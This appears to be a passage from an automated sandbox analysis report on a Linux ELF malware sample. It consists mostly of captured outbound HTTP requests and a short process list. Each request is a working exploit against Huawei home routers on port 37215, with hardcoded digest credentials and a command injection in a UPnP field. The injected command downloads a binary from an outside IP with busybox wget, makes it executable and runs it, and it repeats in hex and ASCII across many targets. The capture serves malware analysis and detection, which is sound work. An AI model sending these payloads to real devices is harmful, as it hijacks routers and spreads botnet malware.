[TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        141192.168.2.145671041.199.255.24437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130358934 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        142192.168.2.1452570197.177.48.1837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130400896 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        143192.168.2.1446430156.172.255.7037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130412102 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        144192.168.2.1452674156.211.164.4937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130858898 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        145192.168.2.1455648197.169.39.14037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130933046 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        146192.168.2.1455280156.88.26.13737215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130958080 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        147192.168.2.1441422197.47.117.17037215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.130987883 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        148192.168.2.1438824156.236.192.1637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.131026030 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        149192.168.2.144772041.220.138.12937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.131053925 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        System Behavior

                                                        Start time (UTC):19:31:54
                                                        Start date (UTC):13/06/2024
                                                        Path:/tmp/i586.elf
                                                        Arguments:/tmp/i586.elf
                                                        File size:111889 bytes
                                                        MD5 hash:a87c9427ea3736589feeea4f976a3b5b

                                                        Start time (UTC):19:31:54
                                                        Start date (UTC):13/06/2024
                                                        Path:/tmp/i586.elf
                                                        Arguments:-
                                                        File size:111889 bytes
                                                        MD5 hash:a87c9427ea3736589feeea4f976a3b5b

                                                        Start time (UTC):19:31:54
                                                        Start date (UTC):13/06/2024
                                                        Path:/tmp/i586.elf
                                                        Arguments:-
                                                        File size:111889 bytes
                                                        MD5 hash:a87c9427ea3736589feeea4f976a3b5b
                                                        Start time (UTC):19:31:54
                                                        Start date (UTC):13/06/2024
                                                        Path:/tmp/i586.elf
                                                        Arguments:-
                                                        File size:111889 bytes
                                                        MD5 hash:a87c9427ea3736589feeea4f976a3b5b

                                                        Start time (UTC):19:31:54
                                                        Start date (UTC):13/06/2024
                                                        Path:/tmp/i586.elf
                                                        Arguments:-
                                                        File size:111889 bytes
                                                        MD5 hash:a87c9427ea3736589feeea4f976a3b5b